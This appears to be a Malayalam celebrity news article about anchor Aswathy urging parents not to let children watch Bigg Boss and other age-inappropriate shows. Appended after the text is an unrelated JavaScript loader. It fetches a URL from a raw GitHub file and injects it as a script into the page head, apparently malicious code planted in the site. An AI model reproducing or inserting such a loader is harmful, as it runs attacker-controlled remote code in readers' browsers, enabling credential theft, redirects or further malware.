“കുട്ടികളെ ബിഗ് ബോസ് കാണിക്കണോ”? അവതാരകയും എഴുത്തുകാരിയും യൂട്യൂബറും ആയ അശ്വതി കഴിഞ്ഞദിവസം ഒരു സമൂഹ മാധ്യമത്തിൽ പങ്കുവെച്ച ചോദ്യമാണിത് ,ലാലേട്ടൻ തന്നെ കഴിഞ്ഞദിവസം പറയുന്നുണ്ടായി കണ്ടസ്റ്റന്റ് എല്ലാം കുറച്ചുകൂടി കെയർഫുൾ ആകണം കുട്ടികൾ അടക്കം ഇരുന്നു കാണുന്ന ഒരു ഷോയാണ് ബിഗ് ബോസ് എന്ന്. ബിഗ്ഗ് ബോസ്സ് കുട്ടികളും കാണുന്നുണ്ടോ എന്ന് താൻ അപ്പോൾ അമ്പരപ്പോടെ ആലോചിച്ചു. മാത്രമല്ല കഴിഞ്ഞദിവസം താൻ പല ലൊക്കേഷനുകളിലും പോയപ്പോൾ കുട്ടികൾ അടക്കം ബിഗ് ബോസ് കാണുന്നതും തൻറെ ശ്രദ്ധയിൽപ്പെട്ടതായി താരം പറയുന്നു. മാതാപിതാക്കൾ ഇത്തരമൊരു ഷോ കുട്ടികളെ കാണിക്കുന്നതിന് മുമ്പ് യാതൊരു ചിന്തയും ഇതിന് കൊടുക്കുന്നില്ല എന്ന് താരം കുറ്റപ്പെടുത്തി. താൻ ഒരിക്കലും തന്റെ കുട്ടികളെ ബിഗ് ബോസ് കാണിക്കുകയില്ല എന്നും അശ്വതി പറയുന്നു. ബിഗ് ബോസിലെ കണ്ടന്റ് കുട്ടികൾക്ക് ആവശ്യമുള്ളതല്ല എന്നുള്ളതുകൊണ്ടാണ് അല്ലാതെ ഷോ മോശമായതുകൊണ്ടല്ല എന്നും താരും കൂട്ടിച്ചേർക്കുന്നു. ബിഗ് ബോസ് 16 വയസ്സിന് മുകളിലുള്ളവരെ ഉദ്ദേശിച്ചുള്ളതാണ്. ഇന്നത്തെ മാതാപിതാക്കൾ കുട്ടികളെ എന്ത് കാണിക്കണം കാണിക്കേണ്ട എന്നുള്ളതിനെ കുറിച്ച് യാതൊരുവിധത്തിലും ചിന്തിക്കുന്നില്ല ഹോറർ സിനിമകൾക്കും വയലൻസ് വളരെയധികം ഉള്ള ചിത്രങ്ങൾക്കും കുട്ടികളെയും കൂട്ടി പോകുന്ന മാതാപിതാക്കൾ ഇന്ന് കേരളത്തിൽ ധാരാളമുണ്ട് എല്ലാത്തിലും അത് ഉപയോഗിക്കേണ്ട ആളുകളുടെ പ്രായം നിശ്ചയിച്ചിട്ടുണ്ട് എന്നാൽ നമ്മൾ കുട്ടികൾക്ക് ഇത്തരത്തിലുള്ള കാഴ്ചകൾ നൽകുമ്പോൾ അത് അവർക്കുള്ളത് ആണോ എന്ന് ശ്രദ്ധിക്കുന്നില്ല ഓരോ പ്രായത്തിലും എന്ത് കാണണമോ അത്തരം ഷോകൾ മാത്രമേ കുട്ടികളെ കാണിക്കാൻ പാടുള്ളൂ എന്നും അവർ പറയുന്നു. അവർ എല്ലാം കണ്ടു വളരട്ടെ ഈ സമൂഹത്തിൽ ജീവിക്കേണ്ടതല്ലേ എന്ന കാഴ്ചപ്പാടാണ് പല മാതാപിതാക്കൾക്കും ഉള്ളത് അത് തെറ്റാണെന്നും അശ്വതി പറയുന്നു സെക്ഷുവൽ കോൺടന്റ് ഉള്ള ചിത്രങ്ങളിൽ നിന്ന് മാത്രം കുട്ടികളെ ഒഴിവാക്കി നിർത്തിയാൽ മതി മറ്റുള്ള ഒരു ചിത്രങ്ങളിലും ഫിൽട്രേഷന്റെ ആവശ്യമില്ല എന്നുള്ള മാതാപിതാക്കളുടെ ഈ ഒരു ബോധമില്ലായ്മ മാറ്റിവയ്ക്കേണ്ടത് ഇന്നത്തെ സമൂഹത്തിൽ വളരെ അത്യാവശ്യമാണെന്നും അശ്വതി ഓർമ്മപ്പെടുത്തുന്നു.
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)